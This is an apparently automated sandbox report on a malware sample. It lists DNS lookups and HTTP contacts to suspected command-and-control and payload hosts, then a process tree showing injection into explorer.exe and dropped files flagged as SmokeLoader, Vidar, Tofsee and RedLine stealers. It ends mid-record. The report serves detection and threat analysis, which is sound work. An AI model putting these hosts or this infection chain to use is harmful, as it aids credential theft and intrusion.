                                                                                  Jan 14, 2022 09:25:01.666069984 CET8.8.8.8192.168.2.40xe4b6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:01.841012955 CET8.8.8.8192.168.2.40x8084No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:02.297612906 CET8.8.8.8192.168.2.40x92dfNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:04.487859011 CET8.8.8.8192.168.2.40x133bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:04.958055973 CET8.8.8.8192.168.2.40x824aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.424448967 CET8.8.8.8192.168.2.40x4276No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:05.763828993 CET8.8.8.8192.168.2.40xe630No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.228406906 CET8.8.8.8192.168.2.40x2f13No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.478178978 CET8.8.8.8192.168.2.40x6231No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:06.824743986 CET8.8.8.8192.168.2.40xdf03No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.291708946 CET8.8.8.8192.168.2.40xc429No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.460710049 CET8.8.8.8192.168.2.40x1c71No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:07.627312899 CET8.8.8.8192.168.2.40xdf90No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:08.099401951 CET8.8.8.8192.168.2.40x9e69No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.078922033 CET8.8.8.8192.168.2.40x36a9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.251872063 CET8.8.8.8192.168.2.40x93a7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.421320915 CET8.8.8.8192.168.2.40xbaacNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:10.588691950 CET8.8.8.8192.168.2.40x8806No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.441111088 CET8.8.8.8192.168.2.40x90ebNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.634314060 CET8.8.8.8192.168.2.40xfe69No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.799860001 CET8.8.8.8192.168.2.40x9cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:14.996831894 CET8.8.8.8192.168.2.40xa24eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.788121939 CET8.8.8.8192.168.2.40x73edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:16.968163013 CET8.8.8.8192.168.2.40xcf20No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:17.136274099 CET8.8.8.8192.168.2.40x702fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:35.761554003 CET8.8.8.8192.168.2.40xaa98No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.421423912 CET8.8.8.8192.168.2.40x571No error (0)patmushta.info185.188.183.61A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.519500017 CET8.8.8.8192.168.2.40xe74cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.704005003 CET8.8.8.8192.168.2.40x7390No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:38.875216007 CET8.8.8.8192.168.2.40x8cdcNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.040910959 CET8.8.8.8192.168.2.40xffa9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.209981918 CET8.8.8.8192.168.2.40xfc72No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.377321959 CET8.8.8.8192.168.2.40x3b0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.547108889 CET8.8.8.8192.168.2.40x920No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.711781025 CET8.8.8.8192.168.2.40x24e6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:39.924561024 CET8.8.8.8192.168.2.40x4803No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.088764906 CET8.8.8.8192.168.2.40x5683No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.256330013 CET8.8.8.8192.168.2.40xf82aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.428683043 CET8.8.8.8192.168.2.40x3a0dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:40.615529060 CET8.8.8.8192.168.2.40x19d5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:41.087089062 CET8.8.8.8192.168.2.40x2a54No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.236279964 CET8.8.8.8192.168.2.40xb533No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.412606001 CET8.8.8.8192.168.2.40xf8e5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.609112024 CET8.8.8.8192.168.2.40x709aNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:44.609112024 CET8.8.8.8192.168.2.40x709aNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.059613943 CET8.8.8.8192.168.2.40x2e9cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.226744890 CET8.8.8.8192.168.2.40x4d69No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.376952887 CET8.8.8.8192.168.2.40x7264No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.545367956 CET8.8.8.8192.168.2.40x4cdbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.710396051 CET8.8.8.8192.168.2.40xec9aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:45.907784939 CET8.8.8.8192.168.2.40x4146No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:46.080140114 CET8.8.8.8192.168.2.40x3909No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:48.871977091 CET8.8.8.8192.168.2.40x387No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.104904890 CET8.8.8.8192.168.2.40xe7dcNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:49.450273991 CET8.8.8.8192.168.2.40x9abcNo error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.677923918 CET8.8.8.8192.168.2.40x6f10No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:50.844213963 CET8.8.8.8192.168.2.40x450bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:51.036268950 CET8.8.8.8192.168.2.40xc9d6No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:55.984693050 CET8.8.8.8192.168.2.40x9c3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.155317068 CET8.8.8.8192.168.2.40xbfd2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.321657896 CET8.8.8.8192.168.2.40x9b36No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.513890982 CET8.8.8.8192.168.2.40xa220No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:25:56.740719080 CET8.8.8.8192.168.2.40xe9f1No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.287682056 CET8.8.8.8192.168.2.40x327No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.458193064 CET8.8.8.8192.168.2.40xd067No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:02.633424044 CET8.8.8.8192.168.2.40x6ba5No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.274209023 CET8.8.8.8192.168.2.40x56c5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.467144966 CET8.8.8.8192.168.2.40xd10bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:07.820511103 CET8.8.8.8192.168.2.40x33c6No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.056818962 CET8.8.8.8192.168.2.40x8385No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.230015039 CET8.8.8.8192.168.2.40xcd06No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.449105978 CET8.8.8.8192.168.2.40x5a80No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.800724030 CET8.8.8.8192.168.2.40x6be3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:10.973896980 CET8.8.8.8192.168.2.40x21fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:18.754103899 CET8.8.8.8192.168.2.40xe7c1No error (0)patmushta.info185.188.183.61A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:26:25.962934971 CET8.8.8.8192.168.2.40x8983No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                  Jan 14, 2022 09:27:08.820175886 CET8.8.8.8192.168.2.40x62ddNo error (0)patmushta.info185.188.183.61A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • rftojqy.com
                                                                                    • host-data-coin-11.com
                                                                                  • oeicpl.com
                                                                                  • gmlcwn.org
                                                                                  • pmxge.org
                                                                                  • klnnrs.org
                                                                                  • sqgycmxrcw.org
                                                                                  • ordgyi.com
                                                                                  • gdpbobblv.org
                                                                                  • data-host-coin-8.com
                                                                                  • ojnph.org
                                                                                  • qnhvcpx.org
                                                                                  • ukmdaxlu.com
                                                                                  • cocugqsn.org
                                                                                  • bcdqnjq.com
                                                                                  • unicupload.top
                                                                                  • quobomy.org
                                                                                  • hfkcwyd.com
                                                                                  • lhmfcrnoc.net
                                                                                  • rwnoc.com
                                                                                  • hyhfejnsaf.org
                                                                                  • yupkrg.org
                                                                                  • xasgjbpj.net
                                                                                  • dlsrcuywsx.net
                                                                                  • 185.7.214.171:8080
                                                                                  • ygpvsdtxwa.net
                                                                                  • ctudyypa.org
                                                                                  • fnqfdlb.org
                                                                                  • qernbnk.net
                                                                                  • lymetcvj.org
                                                                                  • dwyid.net
                                                                                  • rtyuw.net
                                                                                  • iymvh.com
                                                                                  • aujnrph.com
                                                                                  • qjfqvve.com
                                                                                  • betkhbcokn.net
                                                                                  • buvim.org
                                                                                  • tuwgresxff.net
                                                                                  • esfdrx.org
                                                                                  • gimbqwejt.org
                                                                                  • vqkgjg.net
                                                                                  • qfojwny.com
                                                                                  • jypmxggbe.net
                                                                                  • bopkt.com
                                                                                  • rcosdqvkc.net
                                                                                  • vpvuvi.org
                                                                                  • xchjuwapl.net
                                                                                  • kcgcly.org
                                                                                  • xhcmjwqukh.net
                                                                                  • tbwkdtvra.com
                                                                                  • unlkmoivsp.org
                                                                                  • buyqsohhho.net
                                                                                  • lmtmt.net
                                                                                  • a0621298.xsph.ru
                                                                                  • guadmgqcy.com
                                                                                  • aaxrubcof.net
                                                                                  • uswhy.com
                                                                                  • vqmqnwq.com
                                                                                  • ulfdnrx.net
                                                                                  • vyvnhyowq.net
                                                                                  • 185.215.113.35
                                                                                  • mpjbq.net
                                                                                  • smapchtl.com
                                                                                  • 185.163.204.22
                                                                                  • jeacjnamm.com
                                                                                  • awifxkoma.net
                                                                                  • 185.163.204.24
                                                                                  • aoummij.com
                                                                                  • omefw.net
                                                                                  • bgprljhr.com
                                                                                  • lptdnkjgh.net

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: tijXCZsbGe.exe PID: 6264 Parent PID: 5204

                                                                                  General

                                                                                  Start time:09:24:18
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\Desktop\tijXCZsbGe.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\tijXCZsbGe.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low

                                                                                  Analysis Process: tijXCZsbGe.exe PID: 864 Parent PID: 6264

                                                                                  General

                                                                                  Start time:09:24:19
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\Desktop\tijXCZsbGe.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\tijXCZsbGe.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 864

                                                                                  General

                                                                                  Start time:09:24:26
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                  Imagebase:0x7ff6fee60000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 2192 Parent PID: 568

                                                                                  General

                                                                                  Start time:09:24:27
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 3848 Parent PID: 568

                                                                                  General

                                                                                  Start time:09:24:46
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff732050000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: rifsswe PID: 6952 Parent PID: 968

                                                                                  General

                                                                                  Start time:09:24:58
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Analysis Process: rifsswe PID: 7088 Parent PID: 6952

                                                                                  General

                                                                                  Start time:09:24:59
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\rifsswe
                                                                                  Imagebase:0x400000
                                                                                  File size:320512 bytes
                                                                                  MD5 hash:888928D26BD03678AFD9FED0D92F6FC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Analysis Process: 9334.exe PID: 7100 Parent PID: 3424

                                                                                  General

                                                                                  Start time:09:25:02
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\9334.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\9334.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:301056 bytes
                                                                                  MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 46%, Metadefender, Browse
                                                                                  • Detection: 77%, ReversingLabs
                                                                                  Reputation:moderate

                                                                                  Analysis Process: svchost.exe PID: 7020 Parent PID: 568

                                                                                  General

                                                                                  Start time:09:25:02
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: svchost.exe PID: 7128 Parent PID: 568

                                                                                  General

                                                                                  Start time:09:25:05
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                  Imagebase:0x7ff6eb840000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: WerFault.exe PID: 4972 Parent PID: 7128

                                                                                  General

                                                                                  Start time:09:25:05
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
                                                                                  Imagebase:0xe90000
                                                                                  File size:434592 bytes
                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: WerFault.exe PID: 6552 Parent PID: 7100

                                                                                  General

                                                                                  Start time:09:25:06
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
                                                                                  Imagebase:0xe90000
                                                                                  File size:434592 bytes
                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Analysis Process: DB31.exe PID: 6560 Parent PID: 3424

                                                                                  General

                                                                                  Start time:09:25:07
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\DB31.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\DB31.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:322560 bytes
                                                                                  MD5 hash:6009BCB680BE6C0F656AA157E56423DC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Analysis Process: E748.exe PID: 5476 Parent PID: 3424

                                                                                  General

                                                                                  Start time:09:25:11
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\E748.exe
                                                                                  Imagebase:0x400000
                                                                                  File size:319488 bytes
                                                                                  MD5 hash:7C64BD730B6C9565F287278834A33618
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:low

                                                                                  Analysis Process: F65C.exe PID: 2980 Parent PID: 3424

                                                                                  General

                                                                                  Start time:09:25:14
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  Imagebase:0xab0000
                                                                                  File size:537088 bytes
                                                                                  MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  Reputation:moderate

                                                                                  Analysis Process: cmd.exe PID: 6020 Parent PID: 5476

                                                                                  General

                                                                                  Start time:09:25:16
                                                                                  Start date:14/01/2022
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
